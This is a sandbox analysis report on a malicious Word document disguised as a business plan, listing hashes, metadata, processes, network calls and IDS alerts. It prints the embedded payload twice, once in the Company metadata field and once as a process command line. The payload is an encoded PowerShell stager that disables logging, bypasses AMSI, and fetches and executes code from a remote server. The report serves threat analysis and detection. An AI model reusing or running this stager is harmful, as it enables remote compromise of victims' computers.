File name: | Business Plan Newtradingknowledges — копия.doc |
Full analysis: | https://app.any.run/tasks/e0860f5b-7701-41ed-b08a-8616585b7b43 |
Verdict: | Malicious activity |
Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
Analysis date: | April 23, 2019, 20:04:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | B053F8AEF888CE5580D917FFFC816C97 |
SHA1: | 08B13143028ED8DF00A3405D1027DE7601485B09 |
SHA256: | B8795B46E5FAF75D37BA345CC096BA3919001BDB705245631EB610DDAB5E2CA5 |
SSDEEP: | 768:/A15am1DLGVFfeh+rxjXKCehsOWee+W2sdwUF7bk+a:/AbamlqbfgixjXKZhNWesdVFs+a |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0xc8e48bf2 |
ZipCompressedSize: | 426 |
ZipUncompressedSize: | 1635 |
ZipFileName: | [Content_Types].xml |
Template: | Normal.dotm |
---|---|
TotalEditTime: | 10 minutes |
Pages: | 2 |
Words: | 372 |
Characters: | 2127 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 17 |
Paragraphs: | 4 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | |
Company: | n/a cG93ZXJzaGVsbCAtbm9QIC1zdGEgLXcgMSAtZW5jICBTUUJtQUNnQUpBQlFBRk1BVmdCbEFISUFjd0JKQUU4QVRnQlVBRUVBUWdCTUFHVUFMZ0JRQUZNQVZnQkZBRklBVXdCSkFFOEFUZ0F1QUUwQVlRQnFBRzhBY2dBZ0FDMEFad0JGQUNBQU13QXBBSHNBSkFCSEFGQUFSZ0E5QUZzQVVnQmxBRVlBWFFBdUFFRUFVd0J6QUVVQVRRQkNBR3dBV1FBdUFFY0FSUUJVQUZRQVdRQlFBRVVBS0FBbkFGTUFlUUJ6QUhRQVpRQnRBQzRBVFFCaEFHNEFZUUJuQUdVQWJRQmxBRzRBZEFBdUFFRUFkUUIwQUc4QWJRQmhBSFFBYVFCdkFHNEFMZ0JWQUhRQWFRQnNBSE1BSndBcEFDNEFJZ0JIQUdVQVZBQkdBR2tBWlFCZ0FFd0FSQUFpQUNnQUp3QmpBR0VBWXdCb0FHVUFaQUJIQUhJQWJ3QjFBSEFBVUFCdkFHd0FhUUJqQUhrQVV3QmxBSFFBZEFCcEFHNEFad0J6QUNjQUxBQW5BRTRBSndBckFDY0Fid0J1QUZBQWRRQmlBR3dBYVFCakFDd0FVd0IwQUdFQWRBQnBBR01BSndBcEFEc0FTUUJtQUNnQUpBQkhBRkFBUmdBcEFIc0FKQUJIQUZBQVF3QTlBQ1FBUndCUUFFWUFMZ0JIQUdVQVZBQldBR0VBVEFCMUFHVUFLQUFrQUU0QWRRQk1BR3dBS1FBN0FFa0FSZ0FvQUNRQVJ3QlFBRU1BV3dBbkFGTUFZd0J5QUdrQWNBQjBBRUlBSndBckFDY0FiQUJ2QUdNQWF3Qk1BRzhBWndCbkFHa0FiZ0JuQUNjQVhRQXBBSHNBSkFCSEFGQUFRd0JiQUNjQVV3QmpBSElBYVFCd0FIUUFRZ0FuQUNzQUp3QnNBRzhBWXdCckFFd0Fid0JuQUdjQWFRQnVBR2NBSndCZEFGc0FKd0JGQUc0QVlRQmlBR3dBWlFCVEFHTUFjZ0JwQUhBQWRBQkNBQ2NBS3dBbkFHd0Fid0JqQUdzQVRBQnZBR2NBWndCcEFHNEFad0FuQUYwQVBRQXdBRHNBSkFCSEFGQUFRd0JiQUNjQVV3QmpBSElBYVFCd0FIUUFRZ0FuQUNzQUp3QnNBRzhBWXdCckFFd0Fid0JuQUdjQWFRQnVBR2NBSndCZEFGc0FKd0JGQUc0QVlRQmlBR3dBWlFCVEFHTUFjZ0JwQUhBQWRBQkNBR3dBYndCakFHc0FTUUJ1QUhZQWJ3QmpBR0VBZEFCcEFHOEFiZ0JNQUc4QVp3Qm5BR2tBYmdCbkFDY0FYUUE5QURBQWZRQWtBRllBUVFCc0FEMEFXd0JEQUU4QVRBQk1BRVVBUXdCVUFFa0Fid0J1QUhNQUxnQkhBRVVBVGdCbEFISUFhUUJEQUM0QVJBQkpBR01BVkFCSkFFOEFUZ0JCQUZJQWVRQmJBSE1BVkFCU0FFa0FiZ0JuQUN3QVV3QjVBSE1BZEFCRkFHMEFMZ0JQQUdJQWFnQmxBR01BVkFCZEFGMEFPZ0E2QUc0QVJRQjNBQ2dBS1FBN0FDUUFkZ0JCQUV3QUxnQkJBRVFBUkFBb0FDY0FSUUJ1QUdFQVlnQnNBR1VBVXdCakFISUFhUUJ3QUhRQVFnQW5BQ3NBSndCc0FHOEFZd0JyQUV3QWJ3Qm5BR2NBYVFCdUFHY0FKd0FzQURBQUtRQTdBQ1FBVmdCaEFFd0FMZ0JCQUdRQVpBQW9BQ2NBUlFCdUFHRUFZZ0JzQUdVQVV3QmpBSElBYVFCd0FIUUFRZ0JzQUc4QVl3QnJBRWtBYmdCMkFHOEFZd0JoQUhRQWFRQnZBRzRBVEFCdkFHY0Fad0JwQUc0QVp3QW5BQ3dBTUFBcEFEc0FKQUJIQUZBQVF3QmJBQ2NBU0FCTEFFVUFXUUJmQUV3QVR3QkRBRUVBVEFCZkFFMEFRUUJEQUVnQVNRQk9BRVVBWEFCVEFHOEFaZ0IwQUhjQVlRQnlBR1VBWEFCUUFHOEFiQUJwQUdNQWFRQmxBSE1BWEFCTkFHa0FZd0J5QUc4QWN3QnZBR1lBZEFCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCUUFHOEFkd0JsQUhJQVV3Qm9BR1VBYkFCc0FGd0FVd0JqQUhJQWFRQndBSFFBUWdBbkFDc0FKd0JzQUc4QVl3QnJBRXdBYndCbkFHY0FhUUJ1QUdjQUp3QmRBRDBBSkFCMkFHRUFiQUI5QUVVQVRBQnpBRVVBZXdCYkFGTUFRd0JTQUVrQWNBQlVBRUlBVEFCdkFHTUFhd0JkQUM0QUlnQkhBRVVBZEFCR0FHa0FSUUJnQUd3QVJBQWlBQ2dBSndCekFHa0Fad0J1QUdFQWRBQjFBSElBWlFCekFDY0FMQUFuQUU0QUp3QXJBQ2NBYndCdUFGQUFkUUJpQUd3QWFRQmpBQ3dBVXdCMEFHRUFkQUJwQUdNQUp3QXBBQzRBVXdCRkFIUUFWZ0JCQUV3QVZRQkZBQ2dBSkFCT0FIVUFUQUJzQUN3QUtBQk9BR1VBZHdBdEFFOEFZZ0JxQUVVQVl3QjBBQ0FBUXdCUEFHd0FiQUJGQUdNQVZBQnBBRzhBVGdCekFDNEFSd0JGQUU0QVpRQlNBRWtBUXdBdUFFZ0FZUUJ6QUdnQVV3QkZBRlFBV3dCVEFIUUFjZ0JKQUU0QVJ3QmRBQ2tBS1FCOUFGc0FVZ0JGQUVZQVhRQXVBRUVBVXdCVEFFVUFiUUJDQUV3QVdRQXVBRWNBUlFCVUFGUUFXUUJ3QUdVQUtBQW5BRk1BZVFCekFIUUFaUUJ0QUM0QVRRQmhBRzRBWVFCbkFHVUFiUUJsQUc0QWRBQXVBRUVBZFFCMEFHOEFiUUJoQUhRQWFRQnZBRzRBTGdCQkFHMEFjd0JwQUZVQWRBQnBBR3dBY3dBbkFDa0FmQUEvQUhzQUpBQmZBSDBBZkFBbEFIc0FKQUJmQUM0QVJ3QmxBSFFBUmdCcEFFVUFiQUJrQUNnQUp3QmhBRzBBY3dCcEFFa0FiZ0JwQUhRQVJnQmhBR2tBYkFCbEFHUUFKd0FzQUNjQVRnQnZBRzRBVUFCMUFHSUFiQUJwQUdNQUxBQlRBSFFBWVFCMEFHa0FZd0FuQUNrQUxnQlRBRVVBVkFCV0FHRUFiQUIxQUVVQUtBQWtBRTRBZFFCc0FHd0FMQUFrQUhRQVVnQlZBRVVBS1FCOUFEc0FmUUE3QUZzQVV3QjVBSE1BZEFCRkFHMEFMZ0JPQUdVQWRBQXVBRk1BWlFCU0FIWUFhUUJqQUdVQVVBQnZBR2tBVGdCVUFFMEFZUUJPQUVFQVp3QkZBRklBWFFBNkFEb0FSUUJZQUhBQVpRQmpBSFFBTVFBd0FEQUFRd0J2QUc0QVZBQkpBRTRBZFFCRkFEMEFNQUE3QUNRQVZ3QkRBRDBBVGdCbEFIY0FMUUJQQUdJQVNnQmxBR01BVkFBZ0FGTUFlUUJ6QUhRQVJRQk5BQzRBVGdCRkFGUUFMZ0JYQUVVQVFnQkRBRXdBYVFCbEFHNEFkQUE3QUNRQWRRQTlBQ2NBVFFCdkFIb0FhUUJzQUd3QVlRQXZBRFVBTGdBd0FDQUFLQUJYQUdrQWJnQmtBRzhBZHdCekFDQUFUZ0JVQUNBQU5nQXVBREVBT3dBZ0FGY0FUd0JYQURZQU5BQTdBQ0FBVkFCeUFHa0FaQUJsQUc0QWRBQXZBRGNBTGdBd0FEc0FJQUJ5QUhZQU9nQXhBREVBTGdBd0FDa0FJQUJzQUdrQWF3QmxBQ0FBUndCbEFHTUFhd0J2QUNjQU93QWtBSGNBUXdBdUFFZ0FaUUJoQUdRQVJRQnlBRk1BTGdCQkFFUUFSQUFvQUNjQVZRQnpBR1VBY2dBdEFFRUFad0JsQUc0QWRBQW5BQ3dBSkFCMUFDa0FPd0FrQUZjQVF3QXVBRkFBVWdCUEFGZ0FlUUE5QUZzQVV3QlpBSE1BVkFCbEFHMEFMZ0JPQUdVQWRBQXVBRmNBUlFCQ0FGSUFSUUJSQUhVQVpRQlRBSFFBWFFBNkFEb0FSQUJGQUdZQVFRQlZBRXdBVkFCWEFHVUFRZ0JRQUhJQWJ3QllBSGtBT3dBa0FIY0FRd0F1QUZBQVVnQlBBSGdBV1FBdUFFTUFVZ0JGQUdRQVJRQk9BSFFBYVFCQkFHd0FVd0FnQUQwQUlBQmJBRk1BZVFCekFIUUFSUUJ0QUM0QVRnQkZBSFFBTGdCREFISUFaUUJrQUdVQVRnQjBBRWtBUVFCc0FFTUFZUUJqQUVnQVJRQmRBRG9BT2dCRUFFVUFaZ0JCQUZVQVRBQjBBRTRBWlFCVUFGY0Fid0JTQUdzQVF3QlNBRVVBUkFCbEFFNEFWQUJKQUdFQWJBQlRBRHNBSkFCVEFHTUFjZ0JwQUhBQWRBQTZBRkFBY2dCdkFIZ0FlUUFnQUQwQUlBQWtBSGNBWXdBdUFGQUFjZ0J2QUhnQWVRQTdBQ1FBU3dBOUFGc0FVd0I1QUhNQVZBQkZBRTBBTGdCVUFFVUFlQUIwQUM0QVJRQk9BR01BVHdCRUFFa0FUZ0JIQUYwQU9nQTZBRUVBVXdCREFFa0FTUUF1QUVjQVJRQjBBRUlBZVFCVUFHVUFVd0FvQUNjQVJnQkxBRHdBYVFCMEFDZ0Fld0JFQUg0QWNBQnlBSEVBWlFCQ0FDa0FkUUJGQUU4QVV3QnpBRklBT1FCb0FEZ0FiQUJ0QUhjQU5nQXNBQ1lBUUFBMEFDY0FLUUE3QUNRQVVnQTlBSHNBSkFCRUFDd0FKQUJMQUQwQUpBQkJBRklBWndCekFEc0FKQUJUQUQwQU1BQXVBQzRBTWdBMUFEVUFPd0F3QUM0QUxnQXlBRFVBTlFCOEFDVUFld0FrQUVvQVBRQW9BQ1FBU2dBckFDUUFVd0JiQUNRQVh3QmRBQ3NBSkFCTEFGc0FKQUJmQUNVQUpBQkxBQzRBUXdCdkFGVUFUZ0IwQUYwQUtRQWxBRElBTlFBMkFEc0FKQUJUQUZzQUpBQmZBRjBBTEFBa0FGTUFXd0FrQUVvQVhRQTlBQ1FBVXdCYkFDUUFTZ0JkQUN3QUpBQlRBRnNBSkFCZkFGMEFmUUE3QUNRQVJBQjhBQ1VBZXdBa0FFa0FQUUFvQUNRQVNRQXJBREVBS1FBbEFESUFOUUEyQURzQUpBQklBRDBBS0FBa0FFZ0FLd0FrQUZNQVd3QWtBRWtBWFFBcEFDVUFNZ0ExQURZQU93QWtBRk1BV3dBa0FFa0FYUUFzQUNRQVV3QmJBQ1FBU0FCZEFEMEFKQUJUQUZzQUpBQklBRjBBTEFBa0FGTUFXd0FrQUVrQVhRQTdBQ1FBWHdBdEFHSUFXQUJQQUZJQUpBQlRBRnNBS0FBa0FGTUFXd0FrQUVrQVhRQXJBQ1FBVXdCYkFDUUFTQUJkQUNrQUpRQXlBRFVBTmdCZEFIMEFmUUE3QUNRQWN3QmxBSElBUFFBbkFHZ0FkQUIwQUhBQU9nQXZBQzhBTXdBMEFDNEFNZ0F6QURnQUxnQXlBRE1BTlFBdUFEY0FNd0E2QURnQU1BQW5BRHNBSkFCMEFEMEFKd0F2QUc0QVpRQjNBSE1BTGdCd0FHZ0FjQUFuQURzQUpBQlhBRU1BTGdCSUFHVUFRUUJFQUVVQWNnQlRBQzRBUVFCRUFFUUFLQUFpQUVNQWJ3QnZBR3NBYVFCbEFDSUFMQUFpQUhNQVpRQnpBSE1BYVFCdkFHNEFQUUExQUhvQU5BQkJBRllBZHdCdkFESUFlZ0JyQUVFQVp3QkVBSEFBU2dBMUFFTUFXQUJwQUZZQVRnQlRBSFlBTVFCRkFIY0FWUUE5QUNJQUtRQTdBQ1FBWkFCQkFGUUFZUUE5QUNRQVZ3QkRBQzRBUkFCUEFGY0FiZ0JzQUc4QVFRQkVBRVFBWVFCMEFHRUFLQUFrQUZNQVpRQlNBQ3NBSkFCMEFDa0FPd0FrQUdrQVZnQTlBQ1FBWkFCQkFIUUFZUUJiQURBQUxnQXVBRE1BWFFBN0FDUUFaQUJCQUZRQVFRQTlBQ1FBUkFCaEFIUUFZUUJiQURRQUxnQXVBQ1FBWkFCaEFGUUFRUUF1QUd3QVJRQk9BR2NBZEFCb0FGMEFPd0F0QUdvQVR3QnBBRzRBV3dCREFFZ0FZUUJTQUZzQVhRQmRBQ2dBSmdBZ0FDUUFVZ0FnQUNRQVpBQkJBRlFBWVFBZ0FDZ0FKQUJKQUZZQUt3QWtBRXNBS1FBcEFId0FTUUJGQUZnQQ== |
LinksUpToDate: | No |
CharactersWithSpaces: | 2495 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 16 |
LastModifiedBy: | DarkFell |
RevisionNumber: | 11 |
CreateDate: | 2019:03:04 17:33:00Z |
ModifyDate: | 2019:04:23 19:26:00Z |
Creator: | Jones |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2648 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Business Plan Newtradingknowledges — копия.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1548 | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBJAE8ATgBUAEEAQgBMAGUALgBQAFMAVgBFAFIAUwBJAE8ATgAuAE0AYQBqAG8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBzAEUATQBCAGwAWQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAGEATAB1AGUAKAAkAE4AdQBMAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8ATABMAEUAQwBUAEkAbwBuAHMALgBHAEUATgBlAHIAaQBDAC4ARABJAGMAVABJAE8ATgBBAFIAeQBbAHMAVABSAEkAbgBnACwAUwB5AHMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AG4ARQB3ACgAKQA7ACQAdgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEAbAB9AEUATABzAEUAewBbAFMAQwBSAEkAcABUAEIATABvAGMAawBdAC4AIgBHAEUAdABGAGkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAEwAVQBFACgAJABOAHUATABsACwAKABOAGUAdwAtAE8AYgBqAEUAYwB0ACAAQwBPAGwAbABFAGMAVABpAG8ATgBzAC4ARwBFAE4AZQBSAEkAQwAuAEgAYQBzAGgAUwBFAFQAWwBTAHQAcgBJAE4ARwBdACkAKQB9AFsAUgBFAEYAXQAuAEEAUwBTAEUAbQBCAEwAWQAuAEcARQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAEUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbAB1AEUAKAAkAE4AdQBsAGwALAAkAHQAUgBVAEUAKQB9ADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAGUAdAAuAFMAZQBSAHYAaQBjAGUAUABvAGkATgBUAE0AYQBOAEEAZwBFAFIAXQA6ADoARQBYAHAAZQBjAHQAMQAwADAAQwBvAG4AVABJAE4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAeQBzAHQARQBNAC4ATgBFAFQALgBXAEUAQgBDAEwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgAZQBhAGQARQByAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBPAFgAeQA9AFsAUwBZAHMAVABlAG0ALgBOAGUAdAAuAFcARQBCAFIARQBRAHUAZQBTAHQAXQA6ADoARABFAGYAQQBVAEwAVABXAGUAQgBQAHIAbwBYAHkAOwAkAHcAQwAuAFAAUgBPAHgAWQAuAEMAUgBFAGQARQBOAHQAaQBBAGwAUwAgAD0AIABbAFMAeQBzAHQARQBtAC4ATgBFAHQALgBDAHIAZQBkAGUATgB0AEkAQQBsAEMAYQBjAEgARQBdADoAOgBEAEUAZgBBAFUATAB0AE4AZQBUAFcAbwBSAGsAQwBSAEUARABlAE4AVABJAGEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAVABFAE0ALgBUAEUAeAB0AC4ARQBOAGMATwBEAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQBUAGUAUwAoACcARgBLADwAaQB0ACgAewBEAH4AcAByAHEAZQBCACkAdQBFAE8AUwBzAFIAOQBoADgAbABtAHcANgAsACYAQAA0ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMwA0AC4AMgAzADgALgAyADMANQAuADcAMwA6ADgAMAAnADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABXAEMALgBIAGUAQQBEAEUAcgBTAC4AQQBEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQA1AHoANABBAFYAdwBvADIAegBrAEEAZwBEAHAASgA1AEMAWABpAFYATgBTAHYAMQBFAHcAVQA9ACIAKQA7ACQAZABBAFQAYQA9ACQAVwBDAC4ARABPAFcAbgBsAG8AQQBEAEQAYQB0AGEAKAAkAFMAZQBSACsAJAB0ACkAOwAkAGkAVgA9ACQAZABBAHQAYQBbADAALgAuADMAXQA7ACQAZABBAFQAQQA9ACQARABhAHQAYQBbADQALgAuACQAZABhAFQAQQAuAGwARQBOAGcAdABoAF0AOwAtAGoATwBpAG4AWwBDAEgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQAZABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3368 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\1.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR62C3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VEYLKVVT7UWPRZ9W06AM.temp | — | |
MD5:— | SHA256:— | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1070ad.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:65A14A601AF6597AC6E48922957494B4 | SHA256:0E8EE7C820D5510C7AAE1F3C795EAB1CEB347B99887978BB86C8F4DE742165CB | |||
3368 | NOTEPAD.EXE | C:\Users\admin\Desktop\1.txt | text | |
MD5:770A1E8AEE7B12ACA7EBD64FAFED172F | SHA256:0D3888DCECF63784E97D495352D63ADDD8822AD304AF34C2C4F50A9D8559076A | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$siness Plan Newtradingknowledges — копия.doc | pgc | |
MD5:C59183F24476ACDB99D18ADBF58BA50E | SHA256:2E359B5D30A69C68B84BCC86DF0BEBFCABE2F76A4811843AA2D1CA764C188814 | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1548 | powershell.exe | GET | — | 34.238.235.73:80 | http://34.238.235.73/news.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1548 | powershell.exe | 34.238.235.73:80 | — | Amazon.com, Inc. | US | malicious |
PID | Process | Class | Message |
---|---|---|---|
1548 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell Empire Request HTTP Pattern |
1548 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell Empire Request HTTP Pattern |